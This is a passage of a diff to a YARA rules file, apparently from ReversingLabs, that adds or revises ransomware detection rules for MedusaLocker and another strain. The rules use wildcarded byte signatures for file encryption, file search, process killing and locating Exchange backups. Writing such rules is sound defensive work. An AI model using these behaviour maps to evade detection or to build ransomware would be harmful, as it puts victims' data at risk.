C4 ?? 8D 54 24 ?? 52 + 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 + C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ?? + 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D + C3 + } + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66 + 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A + ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ?? + ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? + ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 + 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B + 7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ?? + 7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D + 44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8 + ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44 + } + $encrypt_files_p2 = { + 24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? + ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ?? + ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ?? + ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8 + ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24 + ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ?? + 75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 + ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? + ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 + C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ?? + ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1 + E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24 + ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24 + } + $encrypt_files_p3 = { + 99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? + ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B + F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 + 24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ?? + ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C + 24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C + ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68 + } + $encrypt_files_p4 = { + 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D + 74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D + 4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E + 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C + 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_MS_xchange_backups_p1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? + 8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24 + ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24 + ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ?? + 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? + 8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ?? + 52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ?? + FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ?? + 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8 + } + $find_MS_xchange_backups_p2 = { + 83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A + ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24 + ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24 + ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF + D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84 + 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ?? + 30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? + 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? + ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89 + 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC + E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UNITEKH-S, OOO" and pe.signatures[i].serial=="62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($find_MS_xchange_backups_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects MedusaLocker ransomware." author = "ReversingLabs" - id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4" - date = "2023-11-08" - modified = "2023-11-08" + id = "8bfcfe13-b519-5c03-9770-cf245b01c395" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4160-L4176" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "MedusaLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 + 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? + 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 + C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? + ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? + ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? + 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? + 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 + ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 + } + $encrypt_files_p2 = { + 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 + ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ?? + C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? + 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15 + ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? + ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? + ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 + } + $encrypt_files_p3 = { + 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ?? + ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 + ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? + ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ?? + 89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89 + 45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D + C2 + } + $search_files_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D + ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83 + 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B + 45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ?? + ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85 + ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ?? + ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57 + FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? + 8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $search_files_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ?? + ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ?? + ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ?? + ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68 + ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? + ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ?? + ?? ?? ?? 83 C4 ?? EB + } + $enum_resources = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ?? + ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89 + 54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 + 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D + 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52 + 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B + 55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 + 8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? + ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $kill_processes = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ?? + ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D + ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ?? + ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 + FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32 + C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $kill_processes_call = { + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? + 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 